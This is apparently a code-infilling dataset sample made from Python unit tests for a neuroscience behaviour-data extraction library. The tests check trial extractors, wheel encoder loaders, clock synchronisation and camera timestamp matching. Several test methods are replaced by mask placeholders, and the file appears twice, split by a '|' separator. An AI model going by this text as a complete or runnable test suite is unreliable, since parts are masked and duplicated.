self.assertTrue(all(choice[trial_nogo]) == 0)
choice = biased_trials.Choice(session_path=self.biased_ge5['path']
).extract(save=False)[0]
self.assertTrue(isinstance(choice, np.ndarray))
data = raw.load_data(self.biased_ge5['path'])
trial_nogo = np.array([(~np.isnan(t['behavior_data'][
'States timestamps']['no_go'][0][0])) for t in data])
if any(trial_nogo):
self.assertTrue(all(choice[trial_nogo]) == 0)
def test_get_repNum(self):
rn = training_trials.RepNum(self.training_lt5['path']).extract()[0]
self.assertTrue(isinstance(rn, np.ndarray))
for i in range(3):
self.assertTrue(i in rn)
rn = training_trials.RepNum(self.training_ge5['path']).extract()[0]
self.assertTrue(isinstance(rn, np.ndarray))
for i in range(4):
self.assertTrue(i in rn)
def test_get_rewardVolume(self):
rv = training_trials.RewardVolume(self.training_lt5['path']).extract()[
0]
self.assertTrue(isinstance(rv, np.ndarray))
rv = training_trials.RewardVolume(self.training_ge5['path']).extract()[
0]
self.assertTrue(isinstance(rv, np.ndarray))
rv = biased_trials.RewardVolume(self.biased_lt5['path']).extract()[0]
self.assertTrue(isinstance(rv, np.ndarray))
self.assertTrue(all([(x == max(rv)) for x in rv if x != 0]))
rv = biased_trials.RewardVolume(self.biased_ge5['path']).extract()[0]
self.assertTrue(isinstance(rv, np.ndarray))
self.assertTrue(all([(x == max(rv)) for x in rv if x != 0]))
def test_get_feedback_times_ge5(self):
ft = training_trials.FeedbackTimes(self.training_ge5['path']).extract(
)[0]
self.assertTrue(isinstance(ft, np.ndarray))
ft = biased_trials.FeedbackTimes(self.biased_ge5['path']).extract()[0]
self.assertTrue(isinstance(ft, np.ndarray))
def test_get_feedback_times_lt5(self):
ft = training_trials.FeedbackTimes(self.training_lt5['path']).extract(
)[0]
self.assertTrue(isinstance(ft, np.ndarray))
ft = biased_trials.FeedbackTimes(self.biased_lt5['path']).extract()[0]
self.assertTrue(isinstance(ft, np.ndarray))
def test_get_stimOnTrigger_times(self):
sott = training_trials.StimOnTriggerTimes(self.training_lt5['path']
).extract()[0]
self.assertTrue(isinstance(sott, np.ndarray))
sott = training_trials.StimOnTriggerTimes(self.training_ge5['path']
).extract()[0]
self.assertTrue(isinstance(sott, np.ndarray))
sott = biased_trials.StimOnTriggerTimes(self.biased_lt5['path']
).extract()[0]
self.assertTrue(isinstance(sott, np.ndarray))
sott = biased_trials.StimOnTriggerTimes(self.biased_ge5['path']
).extract()[0]
self.assertTrue(isinstance(sott, np.ndarray))
<mask token>
<mask token>
<mask token>
def test_get_intervals(self):
di = training_trials.Intervals(self.training_lt5['path']).extract()[0]
self.assertTrue(isinstance(di, np.ndarray))
self.assertFalse(np.isnan(di).all())
di = training_trials.Intervals(self.training_ge5['path']).extract()[0]
self.assertTrue(isinstance(di, np.ndarray))
self.assertFalse(np.isnan(di).all())
di = biased_trials.Intervals(self.training_lt5['path']).extract()[0]
self.assertTrue(isinstance(di, np.ndarray))
self.assertFalse(np.isnan(di).all())
di = biased_trials.Intervals(self.training_ge5['path']).extract()[0]
self.assertTrue(isinstance(di, np.ndarray))
self.assertFalse(np.isnan(di).all())
def test_get_response_times(self):
rt = training_trials.ResponseTimes(self.training_lt5['path']).extract(
)[0]
self.assertTrue(isinstance(rt, np.ndarray))
rt = training_trials.ResponseTimes(self.training_ge5['path']).extract(
)[0]
self.assertTrue(isinstance(rt, np.ndarray))
rt = biased_trials.ResponseTimes(self.biased_lt5['path']).extract()[0]
self.assertTrue(isinstance(rt, np.ndarray))
rt = biased_trials.ResponseTimes(self.biased_ge5['path']).extract()[0]
self.assertTrue(isinstance(rt, np.ndarray))
<mask token>
def test_get_goCueOnset_times(self):
gcot = training_trials.GoCueTimes(self.training_lt5['path']).extract()[
0]
self.assertTrue(isinstance(gcot, np.ndarray))
self.assertTrue(np.all(np.isnan(gcot)))
self.assertTrue(gcot.size != 0 or gcot.size == 4)
gcot = training_trials.GoCueTimes(self.training_ge5['path']).extract()[
0]
self.assertTrue(isinstance(gcot, np.ndarray))
self.assertFalse(np.any(np.isnan(gcot)))
self.assertTrue(gcot.size != 0 or gcot.size == 12)
gcot = biased_trials.GoCueTimes(self.biased_lt5['path']).extract()[0]
self.assertTrue(isinstance(gcot, np.ndarray))
self.assertFalse(np.any(np.isnan(gcot)))
self.assertTrue(gcot.size != 0 or gcot.size == 4)
gcot = biased_trials.GoCueTimes(self.biased_ge5['path']).extract()[0]
self.assertTrue(isinstance(gcot, np.ndarray))
self.assertFalse(np.any(np.isnan(gcot)))
self.assertTrue(gcot.size != 0 or gcot.size == 8)
<mask token>
<mask token>
def test_get_included_trials(self):
it = training_trials.IncludedTrials(self.training_lt5['path']).extract(
settings={'IBLRIG_VERSION_TAG': '4.9.9'})[0]
self.assertTrue(isinstance(it, np.ndarray))
it = training_trials.IncludedTrials(self.training_ge5['path']).extract(
)[0]
self.assertTrue(isinstance(it, np.ndarray))
it = biased_trials.IncludedTrials(self.biased_lt5['path']).extract(
settings={'IBLRIG_VERSION_TAG': '4.9.9'})[0]
self.assertTrue(isinstance(it, np.ndarray))
it = biased_trials.IncludedTrials(self.biased_ge5['path']).extract()[0]
self.assertTrue(isinstance(it, np.ndarray))
@wheelMoves_fixture
def test_extract_all(self):
with self.assertRaises(ValueError) as ex:
training_trials.extract_all(self.training_lt5['path'], settings
={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)
self.assertIn('_ibl_wheelMoves.intervals.npy appears to be empty',
str(ex.exception))
out, files = training_trials.extract_all(self.training_ge5['path'],
save=True)
self.assertEqual(19, len(out))
self.assertTrue(all(map(Path.exists, files)))
with unittest.mock.patch('ibllib.io.extractors.biased_trials.Wheel'
) as Wheel:
Wheel.var_names = tuple()
Wheel().extract.return_value = {}, []
out, files = biased_trials.extract_all(self.biased_lt5['path'],
settings={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)
self.assertEqual(15, len(out))
self.assertTrue(all(map(Path.exists, files)))
out, files = biased_trials.extract_all(self.biased_ge5['path'],
save=True)
self.assertEqual(19, len(out))
self.assertTrue(all(map(Path.exists, files)))
def test_encoder_positions_clock_reset(self):
path = self.training_lt5['path'] / 'raw_behavior_data'
path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)
dy = raw._load_encoder_positions_file_lt5(path)
dat = np.array([849736, 1532230, 1822449, 1833514, 1841566, 1848206,
1853979, 1859144])
self.assertTrue(np.all(np.diff(dy['re_ts']) > 0))
self.assertTrue(all(dy['re_ts'][6:] - 2 ** 32 - dat == 0))
def test_encoder_positions_clock_errors(self):
path = self.biased_lt5['path'] / 'raw_behavior_data'
path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)
dy = raw._load_encoder_positions_file_lt5(path)
self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))
path = self.biased_ge5['path'] / 'raw_behavior_data'
path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)
dy = raw._load_encoder_positions_file_ge5(path)
self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))
def test_wheel_folders(self):
for wf in self.wheel_lt5_path.glob('_iblrig_encoderPositions*.raw*.ssv'
):
df = raw._load_encoder_positions_file_lt5(wf)
self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))
for wf in self.wheel_lt5_path.glob('_iblrig_encoderEvents*.raw*.ssv'):
df = raw._load_encoder_events_file_lt5(wf)
self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))
for wf in self.wheel_ge5_path.glob('_iblrig_encoderPositions*.raw*.ssv'
):
df = raw._load_encoder_positions_file_ge5(wf)
self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))
for wf in self.wheel_ge5_path.glob('_iblrig_encoderEvents*.raw*.ssv'):
df = raw._load_encoder_events_file_ge5(wf)
self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))
def test_load_encoder_positions(self):
raw.load_encoder_positions(self.training_lt5['path'], settings={
'IBLRIG_VERSION_TAG': '4.9.9'})
raw.load_encoder_positions(self.training_ge5['path'])
raw.load_encoder_positions(self.biased_lt5['path'], settings={
'IBLRIG_VERSION_TAG': '4.9.9'})
raw.load_encoder_positions(self.biased_ge5['path'])
<mask token>
<mask token>
<mask token>
class TestSyncWheelBpod(unittest.TestCase):
def test_sync_bpod_bonsai_poor_quality_timestamps(self):
sync_trials_robust = raw.sync_trials_robust
drift_pol = np.array([11 * 1e-06, -20])
np.random.seed(seed=784)
t0_full = np.cumsum(np.random.rand(50)) + 0.001
t1_full = np.polyval(drift_pol, t0_full) + t0_full
t0 = t0_full.copy()
t1 = t1_full.copy()
t0_, t1_ = sync_trials_robust(t0, t1)
assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)
t0_, t1_ = sync_trials_robust(t0, t1[:-1])
assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)
t0_, t1_ = sync_trials_robust(t0, t1[1:])
assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)
t0_, t1_ = sync_trials_robust(t0[1:], t1)
assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)
t0_, t1_ = sync_trials_robust(t0[:-1], t1)
assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)
t0_, t1_ = sync_trials_robust(t0, np.delete(t1, 24))
assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)
t0_, t1_ = sync_trials_robust(np.delete(t0, 12), np.delete(t1, 24))
assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)
class TestWheelLoaders(unittest.TestCase):
def setUp(self) ->None:
self.main_path = Path(__file__).parent
def test_encoder_events_corrupt(self):
path = self.main_path.joinpath('data', 'wheel', 'lt5')
for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):
dy = raw._load_encoder_events_file_lt5(file_events)
self.assertTrue(dy.size > 6)
path = self.main_path.joinpath('data', 'wheel', 'ge5')
for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):
dy = raw._load_encoder_events_file_ge5(file_events)
self.assertTrue(dy.size > 6)
def test_encoder_positions_corrupts(self):
path = self.main_path.joinpath('data', 'wheel', 'ge5')
for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):
dy = raw._load_encoder_positions_file_ge5(file_position)
self.assertTrue(dy.size > 18)
path = self.main_path.joinpath('data', 'wheel', 'lt5')
for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):
dy = raw._load_encoder_positions_file_lt5(file_position)
self.assertTrue(dy.size > 18)
class MockExtracor(BaseExtractor):
save_names = ('some_file.csv', 'some_file.tsv', 'some_file.ssv',
'some_file.npy')
var_names = 'csv', 'ssv', 'tsv', 'npy'
def _extract(self, **kwargs) ->tuple:
csv = pd.DataFrame([1, 2, 3])
ssv = pd.DataFrame([1, 2, 3])
tsv = pd.DataFrame([1, 2, 3])
npy = np.array([1, 2, 3])
return csv, ssv, tsv, npy
class TestBaseExtractorSavingMethods(unittest.TestCase):
def setUp(self) ->None:
self.tempdir = tempfile.TemporaryDirectory()
self.session_path = self.tempdir.name
self.mock_extractor = MockExtracor(self.session_path)
def test_saving_method(self):
data, paths = self.mock_extractor.extract(save=True)
self.assertTrue(all([x.exists() for x in paths]))
def tearDown(self):
self.tempdir.cleanup()
class TestCameraExtractors(unittest.TestCase):
def test_groom_pin_state(self):
fps = 60
t_offset = 39.4
ts = np.arange(0, 10, 1 / fps) + t_offset
ts += np.full_like(ts, 0.0001).cumsum()
n_pulses = 2
pulse_width = 0.3
duty = 0.5
gpio = {'indices': np.empty(n_pulses * 2, dtype=np.int32),
'polarities': np.ones(n_pulses * 2, dtype=np.int32)}
gpio['polarities'][1::2] = -1
aud_offset = 40.0
audio = {'times': np.empty(n_pulses * 2), 'polarities': gpio[
'polarities']}
for p in range(n_pulses):
i = p * 2
rise = pulse_width * p + duty * p + 1
audio['times'][i] = aud_offset + rise
audio['times'][i + 1] = audio['times'][i] + pulse_width
rise += t_offset
gpio['indices'][i] = np.where(ts > rise)[0][0]
gpio['indices'][i + 1] = np.where(ts > rise + pulse_width)[0][0]
gpio_, audio_, ts_ = camera.groom_pin_state(gpio, audio, ts)
        self.assertEqual(audio, audio_, "Audio dict shouldn't be affected")
np.testing.assert_array_almost_equal(ts_[:4], [40.0, 40.016667,
40.033333, 40.05])
delay = 0.08
pulse_width = 1e-05
t = audio['times'][0] + delay
audio['times'] = np.sort(np.append(audio['times'], [t, t +
pulse_width, 80]))
audio['polarities'] = np.ones(audio['times'].shape, dtype=np.int32)
audio['polarities'][1::2] = -1
gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, min_diff
=0.005)
self.assertTrue(audio_['times'].size == gpio_['times'].size == 4)
audio['times'][4] -= 0.3
gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts,
tolerance=0.1, min_diff=0.005)
self.assertTrue(np.all(gpio_['times'] == audio_['times']))
self.assertTrue(np.all(gpio_['times'] == np.array([41.0, 41.3])))
def test_attribute_times(self, display=False):
tsa = np.linspace(0, 60, 60 * 4)[:60]
tsb = np.linspace(0, 60, 60 * 3)[:45]
tsa = np.sort(np.append(tsa, 0.4))
tsb = np.sort(np.append(tsb, 0.41))
if display:
from ibllib.plots import vertical_lines
import matplotlib.pyplot as plt
vertical_lines(tsb, linestyle=':', color='r', label='tsb')
vertical_lines(tsa, linestyle=':', color='b', label='tsa')
plt.legend()
matches = camera.attribute_times(tsa, tsb)
expected = np.array([0, 1, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,
18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,
40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])
np.testing.assert_array_equal(matches, expected)
self.assertEqual(matches.size, tsb.size)
matches = camera.attribute_times(tsa, tsb, take='nearest')
expected[np.r_[1:3]] = expected[1:3] + 1
np.testing.assert_array_equal(matches, expected)
matches = camera.attribute_times(tsa, tsb, take='after')
missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20, 22, 23,
25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43]
expected[missing] = -1
np.testing.assert_array_equal(matches, expected)
matches = camera.attribute_times(tsa, tsb, tol=0.05)
expected = np.array([0, 2, 5, 9, 13, 17, 21, 25, 29, 33, 37, 41, 45,
49, 53, 57])
np.testing.assert_array_equal(matches[matches > -1], expected)
matches = camera.attribute_times(tsa, tsb, injective=False, take=
'nearest')
expected = np.array([0, 2, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,
18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,
40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])
np.testing.assert_array_equal(matches, expected)
with self.assertRaises(ValueError):
camera.attribute_times(tsa, tsb, injective=False, take='closest')
<mask token>
| <mask token>
class TestExtractTrialData(unittest.TestCase):
def setUp(self):
self.main_path = Path(__file__).parent
self.training_lt5 = {'path': self.main_path / 'data' /
'session_training_lt5'}
self.biased_lt5 = {'path': self.main_path / 'data' /
'session_biased_lt5'}
self.training_ge5 = {'path': self.main_path / 'data' /
'session_training_ge5'}
self.biased_ge5 = {'path': self.main_path / 'data' /
'session_biased_ge5'}
self.training_lt5['ntrials'] = len(raw.load_data(self.training_lt5[
'path']))
self.biased_lt5['ntrials'] = len(raw.load_data(self.biased_lt5['path'])
)
self.training_ge5['ntrials'] = len(raw.load_data(self.training_ge5[
'path']))
self.biased_ge5['ntrials'] = len(raw.load_data(self.biased_ge5['path'])
)
self.wheel_ge5_path = self.main_path / 'data' / 'wheel_ge5'
self.wheel_lt5_path = self.main_path / 'data' / 'wheel_lt5'
def test_get_feedbackType(self):
ft = training_trials.FeedbackType(self.training_lt5['path']).extract()[
0]
self.assertEqual(ft.size, self.training_lt5['ntrials'])
self.assertFalse(ft[ft == 0].size > 0)
ft = training_trials.FeedbackType(self.training_ge5['path']).extract()[
0]
self.assertEqual(ft.size, self.training_ge5['ntrials'])
self.assertFalse(ft[ft == 0].size > 0)
ft = biased_trials.FeedbackType(self.biased_lt5['path']).extract()[0]
self.assertEqual(ft.size, self.biased_lt5['ntrials'])
self.assertFalse(ft[ft == 0].size > 0)
ft = biased_trials.FeedbackType(self.biased_ge5['path']).extract()[0]
self.assertEqual(ft.size, self.biased_ge5['ntrials'])
self.assertFalse(ft[ft == 0].size > 0)
def test_get_contrastLR(self):
cl, cr = training_trials.ContrastLR(self.training_lt5['path']).extract(
)[0]
self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))
self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))
self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))
self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))
cl, cr = training_trials.ContrastLR(self.training_ge5['path']).extract(
)[0]
self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))
self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))
self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))
self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))
cl, cr = biased_trials.ContrastLR(self.biased_lt5['path']).extract()[0]
self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))
self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))
self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))
self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))
cl, cr = biased_trials.ContrastLR(self.biased_ge5['path']).extract()[0]
self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))
self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))
self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))
self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))
<mask token>
def test_get_choice(self):
choice = training_trials.Choice(session_path=self.training_lt5['path']
).extract(save=False)[0]
self.assertTrue(isinstance(choice, np.ndarray))
data = raw.load_data(self.training_lt5['path'])
trial_nogo = np.array([(~np.isnan(t['behavior_data'][
'States timestamps']['no_go'][0][0])) for t in data])
if any(trial_nogo):
self.assertTrue(all(choice[trial_nogo]) == 0)
choice = training_trials.Choice(session_path=self.training_ge5['path']
).extract(save=False)[0]
self.assertTrue(isinstance(choice, np.ndarray))
data = raw.load_data(self.training_ge5['path'])
trial_nogo = np.array([(~np.isnan(t['behavior_data'][
'States timestamps']['no_go'][0][0])) for t in data])
if any(trial_nogo):
self.assertTrue(all(choice[trial_nogo]) == 0)
choice = biased_trials.Choice(session_path=self.biased_lt5['path']
).extract(save=False)[0]
self.assertTrue(isinstance(choice, np.ndarray))
data = raw.load_data(self.biased_lt5['path'])
trial_nogo = np.array([(~np.isnan(t['behavior_data'][
'States timestamps']['no_go'][0][0])) for t in data])
if any(trial_nogo):
self.assertTrue(all(choice[trial_nogo]) == 0)
choice = biased_trials.Choice(session_path=self.biased_ge5['path']
).extract(save=False)[0]
self.assertTrue(isinstance(choice, np.ndarray))
data = raw.load_data(self.biased_ge5['path'])
trial_nogo = np.array([(~np.isnan(t['behavior_data'][
'States timestamps']['no_go'][0][0])) for t in data])
if any(trial_nogo):
self.assertTrue(all(choice[trial_nogo]) == 0)
def test_get_repNum(self):
rn = training_trials.RepNum(self.training_lt5['path']).extract()[0]
self.assertTrue(isinstance(rn, np.ndarray))
for i in range(3):
self.assertTrue(i in rn)
rn = training_trials.RepNum(self.training_ge5['path']).extract()[0]
self.assertTrue(isinstance(rn, np.ndarray))
for i in range(4):
self.assertTrue(i in rn)
def test_get_rewardVolume(self):
rv = training_trials.RewardVolume(self.training_lt5['path']).extract()[
0]
self.assertTrue(isinstance(rv, np.ndarray))
rv = training_trials.RewardVolume(self.training_ge5['path']).extract()[
0]
self.assertTrue(isinstance(rv, np.ndarray))
rv = biased_trials.RewardVolume(self.biased_lt5['path']).extract()[0]
self.assertTrue(isinstance(rv, np.ndarray))
self.assertTrue(all([(x == max(rv)) for x in rv if x != 0]))
rv = biased_trials.RewardVolume(self.biased_ge5['path']).extract()[0]
self.assertTrue(isinstance(rv, np.ndarray))
self.assertTrue(all([(x == max(rv)) for x in rv if x != 0]))
def test_get_feedback_times_ge5(self):
ft = training_trials.FeedbackTimes(self.training_ge5['path']).extract(
)[0]
self.assertTrue(isinstance(ft, np.ndarray))
ft = biased_trials.FeedbackTimes(self.biased_ge5['path']).extract()[0]
self.assertTrue(isinstance(ft, np.ndarray))
def test_get_feedback_times_lt5(self):
ft = training_trials.FeedbackTimes(self.training_lt5['path']).extract(
)[0]
self.assertTrue(isinstance(ft, np.ndarray))
ft = biased_trials.FeedbackTimes(self.biased_lt5['path']).extract()[0]
self.assertTrue(isinstance(ft, np.ndarray))
def test_get_stimOnTrigger_times(self):
sott = training_trials.StimOnTriggerTimes(self.training_lt5['path']
).extract()[0]
self.assertTrue(isinstance(sott, np.ndarray))
sott = training_trials.StimOnTriggerTimes(self.training_ge5['path']
).extract()[0]
self.assertTrue(isinstance(sott, np.ndarray))
sott = biased_trials.StimOnTriggerTimes(self.biased_lt5['path']
).extract()[0]
self.assertTrue(isinstance(sott, np.ndarray))
sott = biased_trials.StimOnTriggerTimes(self.biased_ge5['path']
).extract()[0]
self.assertTrue(isinstance(sott, np.ndarray))
<mask token>
def test_get_stimOn_times_ge5(self):
st = training_trials.StimOnTimes_deprecated(self.training_ge5['path']
).extract()[0]
self.assertTrue(isinstance(st, np.ndarray))
st = biased_trials.StimOnTimes_deprecated(self.biased_ge5['path']
).extract()[0]
self.assertTrue(isinstance(st, np.ndarray))
<mask token>
def test_get_intervals(self):
di = training_trials.Intervals(self.training_lt5['path']).extract()[0]
self.assertTrue(isinstance(di, np.ndarray))
self.assertFalse(np.isnan(di).all())
di = training_trials.Intervals(self.training_ge5['path']).extract()[0]
self.assertTrue(isinstance(di, np.ndarray))
self.assertFalse(np.isnan(di).all())
di = biased_trials.Intervals(self.training_lt5['path']).extract()[0]
self.assertTrue(isinstance(di, np.ndarray))
self.assertFalse(np.isnan(di).all())
di = biased_trials.Intervals(self.training_ge5['path']).extract()[0]
self.assertTrue(isinstance(di, np.ndarray))
self.assertFalse(np.isnan(di).all())
def test_get_response_times(self):
rt = training_trials.ResponseTimes(self.training_lt5['path']).extract(
)[0]
self.assertTrue(isinstance(rt, np.ndarray))
rt = training_trials.ResponseTimes(self.training_ge5['path']).extract(
)[0]
self.assertTrue(isinstance(rt, np.ndarray))
rt = biased_trials.ResponseTimes(self.biased_lt5['path']).extract()[0]
self.assertTrue(isinstance(rt, np.ndarray))
rt = biased_trials.ResponseTimes(self.biased_ge5['path']).extract()[0]
self.assertTrue(isinstance(rt, np.ndarray))
<mask token>
def test_get_goCueOnset_times(self):
gcot = training_trials.GoCueTimes(self.training_lt5['path']).extract()[
0]
self.assertTrue(isinstance(gcot, np.ndarray))
self.assertTrue(np.all(np.isnan(gcot)))
self.assertTrue(gcot.size != 0 or gcot.size == 4)
gcot = training_trials.GoCueTimes(self.training_ge5['path']).extract()[
0]
self.assertTrue(isinstance(gcot, np.ndarray))
self.assertFalse(np.any(np.isnan(gcot)))
self.assertTrue(gcot.size != 0 or gcot.size == 12)
gcot = biased_trials.GoCueTimes(self.biased_lt5['path']).extract()[0]
self.assertTrue(isinstance(gcot, np.ndarray))
self.assertFalse(np.any(np.isnan(gcot)))
self.assertTrue(gcot.size != 0 or gcot.size == 4)
gcot = biased_trials.GoCueTimes(self.biased_ge5['path']).extract()[0]
self.assertTrue(isinstance(gcot, np.ndarray))
self.assertFalse(np.any(np.isnan(gcot)))
self.assertTrue(gcot.size != 0 or gcot.size == 8)
def test_get_included_trials_lt5(self):
it = training_trials.IncludedTrials(self.training_lt5['path']).extract(
)[0]
self.assertTrue(isinstance(it, np.ndarray))
it = biased_trials.IncludedTrials(self.biased_lt5['path']).extract()[0]
self.assertTrue(isinstance(it, np.ndarray))
def test_get_included_trials_ge5(self):
it = training_trials.IncludedTrials(self.training_ge5['path']).extract(
)[0]
self.assertTrue(isinstance(it, np.ndarray))
it = biased_trials.IncludedTrials(self.biased_ge5['path']).extract()[0]
self.assertTrue(isinstance(it, np.ndarray))
def test_get_included_trials(self):
it = training_trials.IncludedTrials(self.training_lt5['path']).extract(
settings={'IBLRIG_VERSION_TAG': '4.9.9'})[0]
self.assertTrue(isinstance(it, np.ndarray))
it = training_trials.IncludedTrials(self.training_ge5['path']).extract(
)[0]
self.assertTrue(isinstance(it, np.ndarray))
it = biased_trials.IncludedTrials(self.biased_lt5['path']).extract(
settings={'IBLRIG_VERSION_TAG': '4.9.9'})[0]
self.assertTrue(isinstance(it, np.ndarray))
it = biased_trials.IncludedTrials(self.biased_ge5['path']).extract()[0]
self.assertTrue(isinstance(it, np.ndarray))
@wheelMoves_fixture
def test_extract_all(self):
with self.assertRaises(ValueError) as ex:
training_trials.extract_all(self.training_lt5['path'], settings
={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)
self.assertIn('_ibl_wheelMoves.intervals.npy appears to be empty',
str(ex.exception))
out, files = training_trials.extract_all(self.training_ge5['path'],
save=True)
self.assertEqual(19, len(out))
self.assertTrue(all(map(Path.exists, files)))
with unittest.mock.patch('ibllib.io.extractors.biased_trials.Wheel'
) as Wheel:
Wheel.var_names = tuple()
Wheel().extract.return_value = {}, []
out, files = biased_trials.extract_all(self.biased_lt5['path'],
settings={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)
self.assertEqual(15, len(out))
self.assertTrue(all(map(Path.exists, files)))
out, files = biased_trials.extract_all(self.biased_ge5['path'],
save=True)
self.assertEqual(19, len(out))
self.assertTrue(all(map(Path.exists, files)))
def test_encoder_positions_clock_reset(self):
path = self.training_lt5['path'] / 'raw_behavior_data'
path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)
dy = raw._load_encoder_positions_file_lt5(path)
dat = np.array([849736, 1532230, 1822449, 1833514, 1841566, 1848206,
1853979, 1859144])
self.assertTrue(np.all(np.diff(dy['re_ts']) > 0))
self.assertTrue(all(dy['re_ts'][6:] - 2 ** 32 - dat == 0))
def test_encoder_positions_clock_errors(self):
path = self.biased_lt5['path'] / 'raw_behavior_data'
path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)
dy = raw._load_encoder_positions_file_lt5(path)
self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))
path = self.biased_ge5['path'] / 'raw_behavior_data'
path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)
dy = raw._load_encoder_positions_file_ge5(path)
self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))
def test_wheel_folders(self):
for wf in self.wheel_lt5_path.glob('_iblrig_encoderPositions*.raw*.ssv'
):
df = raw._load_encoder_positions_file_lt5(wf)
self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))
for wf in self.wheel_lt5_path.glob('_iblrig_encoderEvents*.raw*.ssv'):
df = raw._load_encoder_events_file_lt5(wf)
self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))
for wf in self.wheel_ge5_path.glob('_iblrig_encoderPositions*.raw*.ssv'
):
df = raw._load_encoder_positions_file_ge5(wf)
self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))
for wf in self.wheel_ge5_path.glob('_iblrig_encoderEvents*.raw*.ssv'):
df = raw._load_encoder_events_file_ge5(wf)
self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))
def test_load_encoder_positions(self):
raw.load_encoder_positions(self.training_lt5['path'], settings={
'IBLRIG_VERSION_TAG': '4.9.9'})
raw.load_encoder_positions(self.training_ge5['path'])
raw.load_encoder_positions(self.biased_lt5['path'], settings={
'IBLRIG_VERSION_TAG': '4.9.9'})
raw.load_encoder_positions(self.biased_ge5['path'])
<mask token>
<mask token>
<mask token>
class TestSyncWheelBpod(unittest.TestCase):
def test_sync_bpod_bonsai_poor_quality_timestamps(self):
sync_trials_robust = raw.sync_trials_robust
drift_pol = np.array([11 * 1e-06, -20])
np.random.seed(seed=784)
t0_full = np.cumsum(np.random.rand(50)) + 0.001
t1_full = np.polyval(drift_pol, t0_full) + t0_full
t0 = t0_full.copy()
t1 = t1_full.copy()
t0_, t1_ = sync_trials_robust(t0, t1)
assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)
t0_, t1_ = sync_trials_robust(t0, t1[:-1])
assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)
t0_, t1_ = sync_trials_robust(t0, t1[1:])
assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)
t0_, t1_ = sync_trials_robust(t0[1:], t1)
assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)
t0_, t1_ = sync_trials_robust(t0[:-1], t1)
assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)
t0_, t1_ = sync_trials_robust(t0, np.delete(t1, 24))
assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)
t0_, t1_ = sync_trials_robust(np.delete(t0, 12), np.delete(t1, 24))
assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)
class TestWheelLoaders(unittest.TestCase):
def setUp(self) ->None:
self.main_path = Path(__file__).parent
def test_encoder_events_corrupt(self):
path = self.main_path.joinpath('data', 'wheel', 'lt5')
for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):
dy = raw._load_encoder_events_file_lt5(file_events)
self.assertTrue(dy.size > 6)
path = self.main_path.joinpath('data', 'wheel', 'ge5')
